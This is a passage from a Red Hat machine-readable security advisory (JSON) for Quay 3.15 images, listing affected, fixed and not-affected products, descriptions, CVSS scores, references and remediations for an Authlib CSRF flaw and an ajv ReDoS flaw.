"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2428102"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Authlib, a Python library used for building OAuth and OpenID Connect servers. The cache-backed state and request-token storage within Authlib is not securely linked to the user\u0027s initiating session. This vulnerability allows a remote attacker to exploit a Cross-Site Request Forgery (CSRF) by obtaining a valid state, which can lead to unauthorized actions being performed on behalf of the user.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Authlib: Authlib: Cross-Site Request Forgery due to improper session management in state storage",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated Moderate for Red Hat products utilizing Authlib, such as Red Hat Ansible Automation Platform, Hosted OpenShift Clusters, Red Hat Quay, and Red Hat Satellite. The flaw arises from improper session management in Authlib\u0027s cache-backed state storage, allowing a remote attacker to perform Cross-Site Request Forgery (CSRF) by obtaining a valid state.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-68158"
},
{
"category": "external",
"summary": "RHBZ#2428102",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2428102"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-68158",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68158"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68158",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68158"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/2808378611dd6fb2532b189a9087877d8f0c0489",
"url": "https://github.com/authlib/authlib/commit/2808378611dd6fb2532b189a9087877d8f0c0489"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/7974f45e4d7492ab5f527577677f2770ce423228",
"url": "https://github.com/authlib/authlib/commit/7974f45e4d7492ab5f527577677f2770ce423228"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/security/advisories/GHSA-fg6f-75jq-6523",
"url": "https://github.com/authlib/authlib/security/advisories/GHSA-fg6f-75jq-6523"
}
],
"release_date": "2026-01-08T17:58:17.724000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "Authlib: Authlib: Cross-Site Request Forgery due to improper session management in state storage"
},
{
"cve": "CVE-2025-69873",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-11T19:01:32.953264+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439070"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in ajv. When the $data option is enabled, the value of the pattern keyword is passed directly to the JavaScript RegExp() constructor without sufficient validation. An attacker able to supply a malicious regular expression pattern can trigger a ReDoS (Regular Expression Denial of Service), causing the application to become unresponsive and resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "ajv: ReDoS via $data reference",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, the $data option must be enabled and the attacker needs to be able to send a payload with a specially crafted regular expression to the application processing the input. A 31-character payload causes approximately 44 seconds of execution, with each additional character doubling the execution time. Therefore, even a small payload can cause an application to become unresponsive and eventually result in a denial of service. Due to this reason, this flaw has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-69873"
},
{
"category": "external",
"summary": "RHBZ#2439070",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439070"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-69873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69873"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"
},
{
"category": "external",
"summary": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md",
"url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md"
}
],
"release_date": "2026-02-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
},
{
"category": "workaround",
"details": "To mitigate this issue, disable the $data feature if your application does not require it. If $data must be used, implement strict validation of the input fields that are referenced by the pattern keyword to ensure they contain only expected and safe characters.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
